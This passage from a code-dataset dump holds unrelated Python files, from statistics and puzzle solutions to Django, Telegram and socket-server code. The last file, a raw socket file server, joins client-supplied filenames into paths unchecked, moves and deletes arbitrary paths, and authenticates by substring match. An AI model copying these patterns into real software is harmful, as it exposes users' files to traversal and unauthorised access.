tau is None:\r\n var = self.var_beta()\r\n else:\r\n var = self.ste * self.ste + tau\r\n\r\n determinant = np.log(var).sum()\r\n if mean_beta is None:\r\n # ML (equiv. REML) estimate of beta:\r\n mean_beta = (self.beta / var).sum() / (1.0 / var).sum()\r\n if reml:\r\n # perform REML\r\n determinant += np.log((1.0 / var).sum()) - np.log(self.beta.shape)\r\n residuals = (self.beta - mean_beta)\r\n rss = (residuals * residuals / var).sum()\r\n \r\n log_likelihood = - 0.5 * (determinant + rss)\r\n return log_likelihood\r\n\r\n\r\nclass FixefEffects(MetaAnalysis):\r\n\r\n def __init__(self, beta, ste):\r\n MetaAnalysis.__init__(self, beta=beta, ste=ste, tau=0)\r\n\r\n\r\nclass RandomEffects(MetaAnalysis):\r\n \"\"\"\r\n We use REML to \r\n\r\n\r\n Quantifying heterogeneity in a meta-analysis\r\n Julian P. T. Higgins and Simon G. Thompson\r\n MRC Biostatistics Unit; Institute of Public Health; Robinson Way; Cambridge CB2 2SR; U.K.\r\n \"\"\"\r\n def __init__(self, beta, ste, reml=True):\r\n self.reml=reml\r\n tau = self.estimate_tau(beta=beta, ste=ste)\r\n MetaAnalysis.__init__(self, beta=beta, ste=ste, tau=tau)\r\n\r\n def tau_ml(self, beta, ste):\r\n meta = MetaAnalysis(beta=beta, ste=ste, tau=0)\r\n def f(x):\r\n return -meta.log_likelihood(tau=x, mean_beta=0)\r\n\r\n tau = mingrid.minimize1D(f, evalgrid=None, nGrid=10, minval=0.0, maxval=(beta*beta).mean(), verbose=False, brent=True,check_boundaries=True, resultgrid=None, return_grid=False)\r\n return tau[0]\r\n\r\n def estimate_tau(self, beta, ste):\r\n meta = MetaAnalysis(beta=beta, ste=ste, tau=0)\r\n def f(x):\r\n return -meta.log_likelihood(tau=x, mean_beta=None, reml=self.reml)\r\n\r\n tau = mingrid.minimize1D(f, evalgrid=None, nGrid=10, minval=0.0, maxval=(beta*beta).mean(), verbose=False, brent=True,check_boundaries=True, resultgrid=None, return_grid=False)\r\n return tau[0]\r\n\r\n\r\nclass HierarchicalRandomEffects(object):\r\n def __init__(self):\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n import pylab as plt\r\n plt.ion()\r\n\r\n N_repeats = 1000\r\n tau = 0.0\r\n beta_true = 0.0\r\n N_tests = 1000\r\n\r\n z_scores = np.zeros(N_repeats)\r\n p_values = np.zeros(N_repeats)\r\n z_scores_re = np.zeros(N_repeats)\r\n p_values_re = np.zeros(N_repeats)\r\n for i in range(N_repeats):\r\n \r\n var = np.random.uniform(size=N_tests)\r\n ste = np.sqrt(var)\r\n beta = np.random.normal(size=N_tests) * np.sqrt(var+tau) + beta_true\r\n \r\n fe = FixefEffects(beta=beta, ste=ste)\r\n p_values[i] = fe.meta_pvalue()\r\n mean_fe = fe.mean_beta()\r\n ste_fe = fe.ste_mean()\r\n var_beta = fe.var_beta()\r\n z_scores[i] = fe.z_score()\r\n\r\n print(\"Fixed effects: mean=%.6f, ste=%.6f, pv=%.6f, z_score=%.6f\" % (mean_fe, ste_fe, p_values[i], z_scores[i]))\r\n\r\n re = RandomEffects(beta=beta, ste=ste)\r\n p_values_re[i] = re.meta_pvalue()\r\n mean_fe = re.mean_beta()\r\n ste_fe = re.ste_mean()\r\n var_beta = re.var_beta()\r\n z_scores_re[i] = re.z_score()\r\n print(\"random effects: mean=%.6f, ste=%.6f, pv=%.6f, z_score=%.6f\" % (mean_fe, ste_fe, p_values_re[i], z_scores_re[i]))\r\n\r\n plt.figure(); plt.hist(z_scores, bins=50)\r\n plt.figure(); plt.hist(p_values)\r\n\r\n plt.figure(); plt.hist(z_scores_re, bins=50)\r\n plt.figure(); plt.hist(p_values_re)\r\n\r\n plt.figure(); plt.plot(z_scores_re*z_scores_re, z_scores*z_scores, '.')\r\n\r\n\r\n\r\n","sub_path":"fastlmm/association/meta_analysis.py","file_name":"meta_analysis.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"422646613","text":"\"\"\"\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\"\"\"\n\nif __name__ == \"__main__\":\n\n i = 20\n while any(bool(i % n) for n in (11, 12, 13, 14, 15, 16, 17, 18, 19, 20)):\n i += 20\n\n print(i)\n","sub_path":"001-009/005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"603560332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re \n\ndef parse_a_label(a_href, root_url):\n try:\n href_value = a_href['href']\n except:\n return\n\n fig_str = r'#$'\n fig_pattern = re.compile(fig_str)\n if(fig_pattern.match(href_value)):\n try:\n str1 = a_href['onclick']\n except:\n print('a label have not a vaule of ATTR onclick')\n return\n \n m = re.findall(\"'([^']+)'\", str1)\n href_value = m[0]\n\n if (re.match(r'http', href_value)):\n return href_value\n\n if (re.match(r'/', href_value)):\n list_href = root_url.split('/')[0:3];\n href_ulr = ''\n for a_href in list_href:\n if (a_href == ''):\n href_ulr = href_ulr + '//'\n else:\n href_ulr = href_ulr + a_href\n\n href_ulr = href_ulr + href_value\n return href_ulr\n \n if (re.match(r'\\.', href_value)):\n href_ulr = root_url + href_value[1:]\n else:\n href_ulr = root_url + href_value\n\n return href_ulr\n \n \n \n \n \n \n","sub_path":"downLoadFrame/parseHtmlElement.py","file_name":"parseHtmlElement.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"66833235","text":"import sys\nsys.stdin = open('cook.txt', 'r')\n\nimport collections\nimport itertools\n\n\ndef CnullG_calculator(lst1, lst2):\n global N, minimi\n sumA = 0\n sumB = 0\n for _ in lst1:\n for __ in lst1:\n if _ == __:\n continue\n else:\n sumA += base[_][__]\n for _ in lst2:\n for __ in lst2:\n if _ == __:\n continue\n else:\n sumB += base[_][__]\n cha = abs(sumA - sumB)\n if cha < minimi:\n minimi = cha\n return\n\n\ndef CnullG_finder():\n # glob\n global N, minimi\n if len(cosA) == N//2 and len(cosB) == N//2:\n CnullG_calculator(cosA, cosB)\n else:\n if len(cosA) != N//2:\n for i in range(N):\n if vztd[i] == 0:\n vztd[i] = 1\n cosA.append(i)\n CnullG_finder()\n cosA.pop()\n vztd[i] = 0\n else:\n continue\n else:\n for i in range(N):\n if vztd[i] == 0:\n vztd[i] = 1\n cosB.append(i)\n CnullG_finder()\n cosB.pop()\n vztd[i] = 0\n else:\n continue\n\n\ntestnum = int(input())\nfor testcase in range(1, testnum+1):\n N = int(input())\n base = [0]*N\n cosA = []\n cosB = []\n vztd = [0]*N\n minimi = 10000000\n for _ in range(N):\n base[_] = list(map(int, input().split()))\n # for i in range(N):\n # vztd[i] = 1\n # cosA.append(i)\n # CnullG_finder()\n # cosA.pop()\n # vztd[i] = 0\n lst = [_ for _ in range(N)]\n\n a = list(itertools.combinations(lst, N//2))\n for i in range(len(a)):\n idx = 0\n inb = 0\n b = [0] * (N // 2)\n aa = [0] * (N // 2)\n for _ in range(N):\n if idx < N//2:\n if a[i][idx] == _:\n aa[idx] = _\n idx += 1\n else:\n b[inb] = _\n inb += 1\n else:\n b[inb] = _\n inb += 1\n CnullG_calculator(aa, b)\n print('#%d %d' %(testcase, minimi))","sub_path":"algorithm_practice/for_ad/chef.py","file_name":"chef.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"358723330","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.core.mail import send_mail\nfrom .forms import EmailForm\nfrom .models import Host\n\ndef get_email(request):\n # If this is a POST request we need to process the form data\n if request.method == 'POST':\n # Create a form instance and populate it with data from the request:\n form = EmailForm(request.POST)\n # Check whether it's valid:\n if form.is_valid():\n # Process the data in form.cleaned_data as required\n message_data = form.cleaned_data['message']\n subject_data = form.cleaned_data['subject']\n\n # Get data from database\n try:\n host_data = Host.objects.get(pk='1')\n print(host_data)\n except:\n pass\n\n # Email\n # https://docs.djangoproject.com/en/1.8/topics/email/\n send_mail(subject_data, message_data, 'from@example.com', ['isarchitture@gmail.com'], fail_silently=False)\n # Redirect to a new URL:\n return HttpResponseRedirect('/name/')\n\n # if a GET (or any other method) we'll create a blank form\n else:\n form = EmailForm()\n\n return render(request, 'jumbotron-form.html', {'form': form})\n","sub_path":"iforms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"654275633","text":"# Truncatable primes\n# Project Euler - Problem 37\n# Sean Malloy\nLIMIT = 1000000\nprimes = [True for _ in range(LIMIT)]\nprimes[0] = primes[1] = False\n\nfor i in range(2, len(primes)):\n if primes[i]:\n step = i\n index = i + step\n while index < len(primes):\n primes[index] = False\n index += step\n\ndef truncate_lr(p):\n return '' if len(str(p)) == 1 else str(p)[1:]\n\ndef truncate_rl(p):\n return '' if len(str(p)) == 1 else str(p)[0:-1]\n\ndef is_truncate(p):\n lr = truncate_lr(p)\n rl = truncate_rl(p)\n while lr != '':\n if not primes[int(lr)] or not primes[int(rl)]:\n return False\n lr = truncate_lr(lr)\n rl = truncate_rl(rl)\n return True\n\ns = 0\nfor p in range(11, len(primes)):\n if primes[p] and is_truncate(p):\n s += p\nprint(s)\n","sub_path":"python/p037.py","file_name":"p037.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"374673409","text":"from toontown.coghq.SpecImports import *\nGlobalEntities = {1000: {'type': 'levelMgr',\n 'name': 'LevelMgr',\n 'comment': '',\n 'parentEntId': 0,\n 'cogLevel': 0,\n 'farPlaneDistance': 1500,\n 'modelFilename': 'phase_10/models/cashbotHQ/ZONE03a',\n 'wantDoors': 1},\n 1001: {'type': 'editMgr',\n 'name': 'EditMgr',\n 'parentEntId': 0,\n 'insertEntity': None,\n 'removeEntity': None,\n 'requestNewEntity': None,\n 'requestSave': None},\n 0: {'type': 'zone',\n 'name': 'UberZone',\n 'comment': '',\n 'parentEntId': 0,\n 'scale': 1,\n 'description': '',\n 'visibility': []},\n 10000: {'type': 'entrancePoint',\n 'name': '',\n 'comment': '',\n 'parentEntId': 0,\n 'pos': Point3(0.0, 6.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': 1,\n 'entranceId': 0,\n 'radius': 15,\n 'theta': 20},\n 10001: {'type': 'mintProduct',\n 'name': '',\n 'comment': '',\n 'parentEntId': 10004,\n 'pos': Point3(-11.4890069962, 20.1173057556, 0.0),\n 'hpr': Point3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10003: {'type': 'mintProduct',\n 'name': 'copy of ',\n 'comment': '',\n 'parentEntId': 10004,\n 'pos': Point3(-20.4286708832, 12.2706327438, 0.0),\n 'hpr': Vec3(90.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10007: {'type': 'mintProduct',\n 'name': 'copy of ',\n 'comment': '',\n 'parentEntId': 10004,\n 'pos': Point3(-19.2144012451, 20.1173057556, 0.0),\n 'hpr': Point3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'mintId': 12700},\n 10006: {'type': 'model',\n 'name': 'crateStack',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(10.5386743546, 18.1184597015, 0.0),\n 'hpr': Vec3(270.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'collisionsOnly': 0,\n 'flattenType': 'light',\n 'loadType': 'loadModelCopy',\n 'modelPath': 'phase_10/models/cashbotHQ/crates_G1.bam'},\n 10008: {'type': 'model',\n 'name': '',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(13.8522205353, -20.3127307892, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0),\n 'collisionsOnly': 0,\n 'flattenType': 'light',\n 'loadType': 'loadModelCopy',\n 'modelPath': 'phase_10/models/cashbotHQ/crates_C1.bam'},\n 10002: {'type': 'nodepath',\n 'name': 'props',\n 'comment': '',\n 'parentEntId': 0,\n 'pos': Point3(0.0, 0.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': 1},\n 10004: {'type': 'nodepath',\n 'name': 'product',\n 'comment': '',\n 'parentEntId': 10002,\n 'pos': Point3(0.0, 0.0, 0.0),\n 'hpr': Vec3(0.0, 0.0, 0.0),\n 'scale': Vec3(1.0, 1.0, 1.0)}}\nScenario0 = {}\nlevelSpec = {'globalEntities': GlobalEntities,\n 'scenarios': [Scenario0]}\n","sub_path":"toontown/coghq/CashbotMintEntrance_Action00.py","file_name":"CashbotMintEntrance_Action00.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"55829618","text":"# coding: utf-8\n\nfrom django.test import TestCase, Client\nfrom django.core.urlresolvers import reverse\n\nfrom core.models import Profile\n\n\nclass AboutViewTest(TestCase):\n def setUp(self):\n self.resp = self.client.get('/about/')\n\n def test_get(self):\n 'GET /about/ must return status code 200'\n self.assertEqual(200, self.resp.status_code)\n\n def test_template(self):\n 'About page must use about.html'\n self.assertTemplateUsed(self.resp, 'about.html')\n\n\nclass ProfileUpdateTest(TestCase):\n fixtures = ['user.json']\n\n def setUp(self):\n self.client = Client()\n self.client.login(username='user', password='user')\n\n self.profile = Profile.objects.get(user__username='user')\n self.profile_data = {\n 'username': self.profile.user.username,\n 'name': self.profile.user.get_full_name(),\n 'email': self.profile.user.email,\n 'about_me': '',\n 'github': '',\n 'facebook': '',\n 'site': '',\n }\n\n def test_update_profile_username(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['username'] = 'new_username'\n\n response = self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('new_username', new_profile.user.username)\n\n def test_update_profile_name(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['name'] = 'User Full Name'\n\n response = self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('User Full Name', new_profile.user.get_full_name())\n\n def test_update_profile_site(self):\n new_profile_data = self.profile_data.copy()\n new_profile_data['site'] = 'http://speakerfight.com/profile/'\n\n response = self.client.post(\n reverse('update_profile', kwargs={\n 'user__username': self.profile.user.username\n }),\n new_profile_data, follow=True)\n\n self.assertEquals(200, response.status_code)\n new_profile = response.context['profile']\n self.assertEquals('http://speakerfight.com/profile/', new_profile.site)\n","sub_path":"core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162614263","text":"import torch\nimport torch.nn as nn\n\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom .inpaint_dataset import InpaintDataset\n\nclass SimpleInpaintDataset(InpaintDataset):\n r\"\"\" A simple implementation of inpaint dataset \n which only supports pre-defined masks\n \n \"\"\"\n \n def __init__(self, img_flist_path, mask_flist_path,\n resize_shape=(256, 256), transforms_oprs=['to_tensor']):\n\n with open(img_flist_path, 'r') as f:\n self.img_paths = f.read().splitlines()\n \n with open(mask_flist_path, 'r') as f:\n self.mask_paths = f.read().splitlines()\n \n # assure that the mask and the image path list are of same length\n assert(len(self.mask_paths) == len(self.img_paths))\n \n self.resize_shape = resize_shape\n self.transform_initialize(resize_shape, transforms_oprs)\n \n def __len__(self):\n return len(self.img_paths)\n \n def __getitem__(self, index):\n # create the paths for images and masks\n img_path = self.img_paths[index]\n img = self.transforms_fun(self.read_img(img_path))\n mask_path = self.mask_paths[index]\n mask = self.read_mask(mask_path)\n mask = self.transforms_fun(mask)\n\n return img * 255, mask\n \n def read_mask(self, path):\n \"\"\"\n Read mask\n \"\"\"\n mask = Image.open(path).convert(\"1\")\n return mask","sub_path":"data/simple_inpaint_dataset.py","file_name":"simple_inpaint_dataset.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"588201893","text":"import pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndf = pd.read_excel('datasets/imiona.xlsx')\nprint(df)\n\ngrupa = df.groupby(['Plec']).agg({'Liczba':['sum']})\nprint(grupa)\nwykres = grupa.plot.bar()\nwykres.set_ylabel('Liczba')\nwykres.set_xlabel('Plec')\nwykres.legend()\nplt.title('liczba urodzonych chłopców i dziewczynek')\nplt.show()","sub_path":"wd_cw09/Zad_2.py","file_name":"Zad_2.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"213912369","text":"from lib import *\nfrom main import *\nfrom telegram.ext import *\nfrom telegram import *\n\nID1_MALUMOT, ID1_BUYURTMA, ID1_MUTAXASSIS, ID1_SAXIFALAR = (\n '📃 Маълумот олиш', '📥 Буюртма бериш', '🗯 Мутаҳассис билан боғланиш', '📲 Ижтимоий тармоқлар'\n)\nbuttons_id1 = ReplyKeyboardMarkup([\n [ID1_MALUMOT, ID1_BUYURTMA], [ID1_MUTAXASSIS, ID1_SAXIFALAR], [BACK]\n], resize_keyboard=True)\n\n\ndef info(update, context):\n update.message.reply_html(id1_info)\n\n\ndef social(update, context):\n update.message.reply_html(id1_social, disable_web_page_preview=True)\n\n\ndef contact(update, context):\n update.message.reply_html(id1_contact, reply_markup=button_back)\n return STATE_ID1_CONTACT\n\n\ndef id1_feedback(update, message):\n telegram_id = update.message.chat_id\n msg = update.message.text\n phone = cursor.execute(\"\"\"SELECT phone_number FROM Users WHERE telegram_id = '{}'\n \"\"\".format(telegram_id)).fetchone()\n name = cursor.execute(\"\"\"SELECT name FROM Users WHERE telegram_id = '{}'\n \"\"\".format(telegram_id)).fetchone()\n f = open('id1/id1_fdbck.txt', 'a')\n f.write(f\"\"\"Пользователь:\n {time.asctime()}\n Имя: {name[0]};\n Телефон: {phone[0]};\n Telegram_ID: {telegram_id};\n \n Сообщение: {msg}\n \\n\\n\"\"\")\n f.close()\n update.message.reply_html(accepted_id1.format(name_of_user(update)))\n\n\ndef order(update, context):\n update.message.reply_html(\"order selected\")\n\n\n","sub_path":"id1/client_id1.py","file_name":"client_id1.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"137287807","text":"#!/usr/bin/env python3\nimport sys\nimport itertools\n\nYES = \"Yes\" # type: str\nNO = \"No\" # type: str\n\n\ndef solve(N: int, M: int, A: \"List[int]\", B: \"List[int]\", C: \"List[int]\", D: \"List[int]\"):\n ab_matrix = [[False] * N for x in range(N)]\n cd_matrix = [[False] * N for x in range(N)]\n\n for a, b in zip(A, B):\n ab_matrix[a-1][b-1] = True\n ab_matrix[b-1][a-1] = True\n for c, d in zip(C, D):\n cd_matrix[c-1][d-1] = True\n cd_matrix[d-1][c-1] = True\n\n # print(ab_matrix)\n # print(cd_matrix)\n\n for perm in itertools.permutations(range(N), N):\n # print(perm)\n ans = True\n for i in range(N):\n for j in range(N):\n # print(f\"i,j,perm[i],perm[j]:{i+1},{j+1},{perm[i]+1},{perm[j]+1}={ab_matrix[i][j] == cd_matrix[perm[i]][perm[j]]}\")\n if ab_matrix[i][j] != cd_matrix[perm[i]][perm[j]]:\n ans = False\n if ans:\n print(YES)\n return\n print(NO)\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n A = [int()] * (M) # type: \"List[int]\"\n B = [int()] * (M) # type: \"List[int]\"\n for i in range(M):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n C = [int()] * (M) # type: \"List[int]\"\n D = [int()] * (M) # type: \"List[int]\"\n for i in range(M):\n C[i] = int(next(tokens))\n D[i] = int(next(tokens))\n solve(N, M, A, B, C, D)\n\nif __name__ == '__main__':\n main()\n","sub_path":"atcoder/python/beginner/abc232/C/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"617612514","text":"from data_gatherer import *\r\nimport datetime\r\nimport os\r\n\r\nUP_AND_DOWN = \"UAD\"\r\nSIDE_TO_SIDE = \"STS\"\r\n\r\nclass BasicStats:\r\n def __init__(self, subjFolderName, sessionFolderName):\r\n self.folderPath = subjFolderName + \"/\" + sessionFolderName\r\n self.subjFolderName = subjFolderName\r\n self.sessionFolderName = sessionFolderName\r\n self.stats = {}\r\n self.stats['dateTime'] = self.dateTime\r\n self.stats['date'] = self.dateTime.strftime(\"%m-%d\")\r\n self.stats['AMPM'] = self.AMPM\r\n self.stats['timeOfDay'] = self.timeOfDay\r\n \r\n headAttitudeRatePoints = MotionFileParser.getHeadAttitudeRatePoints(self.folderPath)\r\n self.stats['isFaultySession'] = self.isFaultySession(headAttitudeRatePoints)\r\n self.stats['duration'] = self.getDuration(headAttitudeRatePoints)\r\n self.stats['direction'] = self.getDirection(headAttitudeRatePoints)\r\n [self.stats['dizzinessPre'], self.stats['dizzinessPost']] = self.getDizzinessRatings(self.folderPath)\r\n \r\n def isFaultySession(self, headAttitudePoints):\r\n return self.getDuration(headAttitudePoints) < 25\r\n \r\n def getDizzinessRatings(self, folderPath):\r\n filePath = folderPath + \"/metadata.txt\"\r\n if os.path.exists(filePath):\r\n f = open(filePath, 'r')\r\n lines = f.readlines()\r\n dizzinessPre = int(lines[0].split(\": \")[1])\r\n dizzinessPost = int(lines[1].split(\": \")[1])\r\n return [dizzinessPre, dizzinessPost]\r\n else:\r\n return ['NA', 'NA']\r\n \r\n @property\r\n def dateTime(self):\r\n parts = self.sessionFolderName.split(\"__\")\r\n dateStr = parts[0].replace(\"Session_\",\"\")\r\n timeStr = parts[1].replace(\"_EDT\",\"\")\r\n dateParts = dateStr.split(\"-\")\r\n timeParts = timeStr.split(\"_\")\r\n \r\n mon = int(dateParts[0])\r\n day = int(dateParts[1])\r\n year = int(dateParts[2])\r\n hour = int(timeParts[0])\r\n minute = int(timeParts[1])\r\n \r\n return datetime.datetime(year, mon, day, hour, minute) \r\n \r\n \r\n def getDuration(self, headAttitudeRatePoints): \r\n startTime = float(headAttitudeRatePoints[0].timeStamp)\r\n endTime = float(headAttitudeRatePoints[-1].timeStamp)\r\n return round(endTime - startTime) \r\n \r\n @property \r\n def AMPM(self):\r\n hour = self.dateTime.hour\r\n if hour >= 12:\r\n return \"PM\"\r\n else:\r\n return \"AM\"\r\n \r\n @property \r\n def timeOfDay(self):\r\n hour = self.dateTime.hour\r\n timeOfDay = \"\"\r\n if hour >= 4 and hour < 12:\r\n timeOfDay = \"morning\"\r\n elif hour >= 12 and hour < 18:\r\n timeOfDay = \"afternoon\"\r\n elif hour >= 18 and hour < 20:\r\n timeOfDay = \"evening\"\r\n else:\r\n timeOfDay = \"night\"\r\n return timeOfDay\r\n \r\n \r\n def getDirection(self, headAttitudeRates):\r\n sumPitch = 0\r\n sumYaw = 0\r\n for pt in headAttitudeRates:\r\n sumPitch += abs(pt.pitch)\r\n sumYaw += abs(pt.yaw)\r\n \r\n if sumYaw > sumPitch * 1.5:\r\n return SIDE_TO_SIDE\r\n else:\r\n return UP_AND_DOWN","sub_path":"ExerciseData/basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"210439793","text":"# python3\r\n\r\nclass Query:\r\n\r\n def __init__(self, query):\r\n self.type = query[0]\r\n if self.type == 'check':\r\n self.ind = int(query[1])\r\n else:\r\n self.s = query[1]\r\n\r\n\r\nclass QueryProcessor:\r\n _multiplier = 263\r\n _prime = 1000000007\r\n\r\n def __init__(self, bucket_count):\r\n self.bucket_count = bucket_count\r\n # store all strings in one list\r\n self.elems = [[]]*bucket_count\r\n\r\n def _hash_func(self, s):\r\n ans = 0\r\n for c in reversed(s):\r\n ans = (ans * self._multiplier + ord(c)) % self._prime\r\n return ans % self.bucket_count\r\n\r\n def write_search_result(self, was_found):\r\n print('yes' if was_found else 'no')\r\n\r\n def write_chain(self, chain):\r\n print(' '.join(chain))\r\n\r\n def read_query(self):\r\n return Query(input().split())\r\n\r\n def process_query(self, query):\r\n if query.type == \"check\":\r\n # use reverse order, because we append strings to the end\r\n if self.elems[query.ind]:\r\n print(' '.join(c for c in reversed(self.elems[query.ind])))\r\n else:\r\n print()\r\n \r\n else:\r\n h = self._hash_func(query.s)\r\n \r\n if query.type == \"add\":\r\n if not self.elems[h]: #if empty list\r\n self.elems[h] = [query.s]\r\n elif query.s not in self.elems[h]:\r\n self.elems[h].append(query.s)\r\n \r\n elif query.type == \"del\":\r\n if query.s in self.elems[h]:\r\n self.elems[h].pop(self.elems[h].index(query.s))\r\n \r\n else: # query_type == \"find\"\r\n was_found = 1 if query.s in self.elems[h] else 0\r\n self.write_search_result(was_found)\r\n \r\n\r\n def process_queries(self):\r\n# n = 12\r\n# query_list = ['add world', 'add HellO', 'check 4', 'find World', \\\r\n# 'find world', 'del world', 'check 4', 'del HellO', \\\r\n# 'add luck', 'add GooD', 'check 2', 'del good']\r\n\r\n n = int(input()) # 2nd line number of queries\r\n for i in range(n):\r\n self.process_query(self.read_query())\r\n\r\nif __name__ == '__main__':\r\n\r\n '''\r\n Implements chaining scheme : list of hash_numbers\r\n elems[hash_number] = ['string1', 'string2', ...]\r\n \r\n Good job! (Max time used: 2.32/7.00, max memory used: 26480640/536870912.)\r\n '''\r\n bucket_count = int(input()) #5\r\n proc = QueryProcessor(bucket_count)\r\n proc.process_queries()\r\n\r\n","sub_path":"algorithms/data_structures/hash_chains_subm.py","file_name":"hash_chains_subm.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349369484","text":"import socket\nimport calendar\nimport os.path\nimport time\nimport sys\nimport urllib\nimport shutil\nimport urllib.request\n\nhost = '0.0.0.0'\nport = 1337\nbacklog = 5\nbuffer = 1024\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind((host,port))\ns.listen(backlog)\n\nf = open(\"users.txt\")\nusers = f.read()\ncombo = users.split(\"\\n\")\n\ndef DWNLOAD(filename):\n try:\n if os.path.isfile(\"public/\" + filename):\n filesize = os.path.getsize('public/' + filename)\n client.send(str.encode(str(filesize)))\n data2 = client.recv(1024)\n datas2 = (data2.decode(encoding='UTF-8'))\n sendfile = open('public/' + filename, 'rb')\n bytes_done = 0\n\n if \"ACK\" in datas2:\n if str(filesize) in datas2:\n try:\n while filesize:\n byte = sendfile.read(1024)\n client.send(byte)\n bytes_done = bytes_done + len(byte)\n if bytes_done == filesize or bytes_done > filesize:\n client.close()\n break\n finally:\n sendfile.close()\n else:\n client.send(str.encode(\"Did not send back exact file size. Will not download.\\n\"))\n else:\n client.send(str.encode(\"ACK NOT RECV\\n\"))\n else:\n client.send(str.encode(\"This file does not exist.\\n\"))\n client.close()\n except:\n print(\"Unexpected error:\", sys.exc_info())\n client.close()\n sendfile.close()\n\ndef WRTFILE(filename, size):\n try:\n done = 0\n size = int(size)\n f = open('public/' + filename + \".temp\", 'a+b',)\n while (size != done):\n ls = client.recv(1024)\n f.write(ls)\n done = done + len(ls)\n if (size == done):\n f.close()\n shutil.copy('public/' + filename + '.temp', 'public/' + filename)\n os.remove(\"public/\" + filename + \".temp\")\n break\n except:\n print(\"Unexpected error:\", sys.exc_info())\n if os.path.isfile(\"public/\" + filename + \".temp\"):\n os.remove(\"public/\" + filename + \".temp\")\n\ndef MOVE():\n\n values = datas.split()\n original = values[1]\n new = values[2]\n print('/public/' + original)\n print('/public/' + new)\n\n shutil.copy(original, new)\n os.remove(original)\n\n client.send(str.encode(\"Moved \" + original + \" to \" + new))\n client.close()\n\n\ndef GET():\n split_com_get = datas.split()\n file = split_com_get[1]\n if os.path.isfile(\"public/\" + file):\n with open(\"public/\" + file) as f:\n for line in f:\n line_b = str.encode(line)\n client.send(line_b)\n else:\n rep = str.encode('File public/' + file + ' does not exist on this server.')\n client.send(rep)\n\ndef SNDTXT():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n\n split_com_get = datas.split()\n file = split_com_get[1]\n\n if os.path.isfile(\"public/\" + file):\n os.remove(\"public/\" + file)\n\n client.send(str.encode(\"Done writing to public/\" + file))\n else:\n client.send(str.encode(\"Incorrect Login\"))\n client.close()\n\ndef GURL():\n getauth = datas.split(\"///\")\n user = getauth[0]\n target = open(\"users.txt\")\n if user in target.read():\n split_com_get = datas.split()\n filen = split_com_get[1]\n url = split_com_get[2]\n\n if os.path.isfile(\"public/\" + filen):\n 